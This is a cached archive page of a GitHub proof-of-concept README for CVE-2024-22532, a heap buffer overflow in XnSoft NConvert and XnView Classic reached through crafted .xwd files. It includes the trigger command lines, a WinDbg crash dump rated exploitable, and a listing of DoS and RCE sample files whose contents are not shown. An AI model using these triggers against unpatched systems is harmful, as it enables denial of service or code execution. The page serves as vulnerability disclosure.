Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-22532 PoC — XNSoft NConvert 安全漏洞

Source
https://github.com/pwndorei/CVE-2024-22532
Associated Vulnerability
Title:XNSoft NConvert 安全漏洞 (CVE-2024-22532)
Description:XNSoft Nconvert是XNSoft公司的一款功能强大的命令行多平台批处理图像处理器,具有 80 多个命令。 XNSoft NConvert 7.163版本存在安全漏洞,该漏洞源于存在缓冲区溢出漏洞,攻击者可以通过特制的xwd文件导致拒绝服务。
Readme
# CVE-2024-22532

## Description

XnSoft XnView Classic 2.51.5 and NConvert 7.163 are vulnerable to Heap-based Buffer Overflow via a crafted .xwd file

### Vendor

- XnSoft

### Affected Products

- XnView Classic 2.51.5
- NConvert 7.163

### Impact

- Denial of Service
- ~~Remote Code Execution~~

### PoC

- Denial of Service
    - cmdline used `nconvert.exe -out pzl -in xwd -o .\tmp.pzl .\poc_dos.xwd`

```
************* Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: 
ModLoad: 00400000 006a8000   D:\BugHunting\nconvert.exe
ModLoad: 775f0000 777a1000   C:\WINDOWS\SYSTEM32\ntdll.dll
ModLoad: 6e3e0000 6e443000   C:\WINDOWS\SysWOW64\verifier.dll
ModLoad: 75b80000 75c70000   C:\WINDOWS\System32\KERNEL32.DLL
ModLoad: 752d0000 75544000   C:\WINDOWS\System32\KERNELBASE.dll
ModLoad: 77200000 773a8000   C:\WINDOWS\System32\USER32.dll
ModLoad: 76c50000 76c6a000   C:\WINDOWS\System32\win32u.dll
ModLoad: 758c0000 758e3000   C:\WINDOWS\System32\GDI32.dll
ModLoad: 75c70000 75d52000   C:\WINDOWS\System32\gdi32full.dll
ModLoad: 76d30000 76da9000   C:\WINDOWS\System32\msvcp_win.dll
ModLoad: 75650000 75762000   C:\WINDOWS\System32\ucrtbase.dll
ModLoad: 75250000 752cf000   C:\WINDOWS\System32\ADVAPI32.dll
ModLoad: 76400000 764c4000   C:\WINDOWS\System32\msvcrt.dll
ModLoad: 765a0000 76625000   C:\WINDOWS\System32\sechost.dll
ModLoad: 757e0000 757fa000   C:\WINDOWS\System32\bcrypt.dll
ModLoad: 76c70000 76d2a000   C:\WINDOWS\System32\RPCRT4.dll
ModLoad: 75d60000 763f8000   C:\WINDOWS\System32\SHELL32.dll
ModLoad: 771d0000 771f5000   C:\WINDOWS\System32\IMM32.DLL
(5fe8.2388): Access violation - code c0000005 (!!! second chance !!!)
eax=07813c00 ebx=00000000 ecx=0000fff8 edx=00010000 esi=07803c08 edi=07818000
eip=005a8eea esp=0019bb10 ebp=0019bb28 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
nconvert+0x1a8eea:
005a8eea f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
0:000> .load D:\windbg_ext\MSEC_x86.dll
0:000> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at nconvert+0x1a8eea (Hash=0x1a1d0618.0x3b1f4010)

User mode write access violations that are not near NULL are exploitable
```

- Remote Code Execution(Only for NConvert 7.163 Windows x86)
    - But `CreateProcessA` Function call fails with error code 0x8(`ERROR_NOT_ENOUGH_MEMORY`)
    - cmdline used `nconvert.exe -out pzl -in xwd -o .\tmp.pzl .\poc_rce.xwd`
    -  TTD record screenshot
![alt](./image0.png)


## Timeline

- 2024.01.12 Vendor Disclosure
- 2024.02.19 Patch Release
File Snapshot

 [4.0K]  /data/pocs/a33f59d12c6cbb4b024a188065fa46e79eb6b400
├── [153K]  image0.png
├── [ 64K]  poc_dos.xwd
├── [1.0M]  poc_rce.xwd
└── [2.7K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.